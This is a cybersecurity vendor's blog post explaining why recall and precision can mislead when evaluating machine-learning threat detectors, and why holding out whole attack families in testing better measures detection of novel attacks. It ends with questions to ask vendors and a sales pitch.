Our Blog | ActZero

Recall & Precision: Not the Whole Story on Cybersecurity Machine Learning Models | ActZero

Written by Brenna Gibbons | Jun 26, 2022 4:00:00 AM

When touting the performance of a machine learning model, companies often cite metrics like recall or precision. However, when it comes to applying such a model to cybersecurity, these numbers can be deceiving. Not necessarily due to any duplicity on the number-citer’s part, but simply due to a surface-level understanding of how data science melds with cybersecurity.

In this blog post, we’ll discuss the validation of machine learning models for catching novel cyberattacks, and I’ll demonstrate the inherent advantage of pairing data scientists with cybersecurity experts.

The tricky thing about new cyber threats

The fun but challenging thing about being a data scientist in cybersecurity is that the landscape isn’t static. There are plenty of attackers using well-known types of attacks, and defending against those is one thing. It’s fairly simple to train a model to catch a known threat. But every day, there is also the possibility of a hacker coming up with something brand new; these are the threats that are most likely to evade detection. In order to excel at protection, you need to be able to catch new attacks, the likes of which you’ve never seen before. Machine learning can help achieve this - but only if you do it right!

In order to optimize a model to catch new threats, extra care must be taken in training and testing the model. Read on for questions to ask when evaluating threat detection models, and why it’s so important to have data science and cybersecurity experts working together.

Testing for what you really want to know

As an IT leader evaluating an AI-powered cybersecurity solution, what you really want, and where machine learning can excel, is in catching new, unknown threats. To explain one nuance in validating a model for this goal, let’s use PowerShell attacks as an example.

The simplest approach to identifying malicious PowerShell scripts would be a rule-based detection or heuristic (see my previous post How Data Science Can Save You from a Heuristics Headache). For example, a very simple rule could be set to look for the word “metasploit” in the command line. Great in that it can be high fidelity, but it would be very bad at catching new or different attacks.

Beyond heuristics, machine learning models can learn what is “normal” PowerShell behavior and predict a variety of threats. However, we need to be careful how we train these models. Cybersecurity experts know that PowerShell attacks come in many different families, and attacks that fall within the same family may look similar, though not identical. We therefore need to make sure that our approach detects attacks from multiple families, not just one, and that it generalizes well to novel attacks. 

Developing models for known vs new attacks

When training a machine learning model, a typical workflow is to train and test the model repeatedly while tuning the parameters, before doing a final test with a special “holdout” test set to get your metrics of interest, such as recall or precision. One common way of choosing the training and test sets for data (at least, for non-time-series data) is to split the data randomly. 

However, if you split all your data randomly, chances are that when you are testing a given data point against the model, there will be another one that is extremely similar to it – e.g. from the same attack family – in the training data. Developing a model with this approach can lead to high performance on known families of attacks, and very poor performance on novel attacks. This kind of model has its uses, but you need to be aware of its limitations.

One way to force the model to be more generalizable is to withhold for testing not a random subset of all attacks, but instead whole families of attacks at a time. That way, the model is tested on something it has no previous examples of, as if it were a novel attack. The reason this strategy works is that many of the underlying components of attacks are the same, although nuanced. A model that is forced to learn these more generalizable characteristics in order to predict new attack families in development is also more likely to catch new attacks in the wild.

Models trained in these two ways have very different strengths. Yet, the aforementioned common metrics (recall and precision) don’t reflect the difference between the two if you only look at the headline numbers. In fact, the second model will often score lower, despite its importance in providing protection against an evolving attack landscape. It’s not that metrics are useless – far from it. But the key is defining to what test set your metrics apply, and knowing that a direct comparison of, for example, recall on a test set of known threats and recall on a test set of novel threats can hide real value in the latter. To catch nuances like these and build metrics that test what you really want to know, it’s valuable to have data scientists and domain experts working side by side.

When data science and security experts work together

A generalizable model is much better when data science experts and cybersecurity experts work together. Data scientists approaching the problem with fresh eyes can come up with non-obvious characteristics for the model to use, while cybersecurity experts ensure that key characteristics are included. Data scientists can set up the test/train split to either optimize for catching known attacks (a random split among the data) or novel attacks (holding out an entire type of attack at a time), while cybersecurity experts determine how the data breaks down into categories and provide a diversity of attack families.

Embedded cybersecurity experts within the team also contribute their deep domain knowledge of how to label data, categorize threats, and provide context and nuance. This helps guide the choices data scientists make as we develop models to keep you safe. 

To see other ways that data scientists and cybersecurity experts collaborate to stop cyber threats, check out a white paper I contributed to: The 'Hyperscale SOC' and the Minds Behind It: A Machine-learning Foundation for Effective Cybersecurity

Know what you’re getting: How to ask data scientists, and cybersecurity vendors, about their models 

For some use cases, taking a random subsample of your data as the test set and using the rest to train is perfectly reasonable. And there are plenty of instances where an “off-the-shelf” model will perform to an acceptable standard. But when the margin for error is small, as it is when facing cyber threats, having trained data scientists oversee machine learning model development is crucial. Choices like how to split your data for testing can have an outsized impact on the effectiveness of the model, and metrics don’t always tell the whole story. 

Knowing what you do now about how typical performance metrics for machine learning models can be deceiving when applied to unforeseen attacks, how can you ensure that the model protecting you will achieve the outcomes you want it to? Here are three simple questions you can ask the next time a cybersecurity vendor tells you their model is a panacea:

  1. What data are you using to train your models? How do you test the models?
    • Listen for data: breadth of data set, data across multiple types of attacks and from varying sources.
    • Listen for testing method: testing on random subsets vs testing on carefully split data

  2. Do you have data scientists and cybersecurity experts on your team? How do they work together?
    • Listen for: Yes we have both. Listen for cybersecurity experts’ participation in feature engineering, as well as data labeling and sourcing.

  3. How would your models react to attack types they haven’t seen before?
    • Listen for: Details that reference the nuances across attack types, including both differences that might escape a narrowly-trained model and similarities that allow for models to generalize. 

For more questions like these, check out our Cybersecurity Vendor Evaluation PackageOr, to test the efficacy of our solution when faced with darkweb-sourced malware, schedule a Ransomware Readiness Assessment today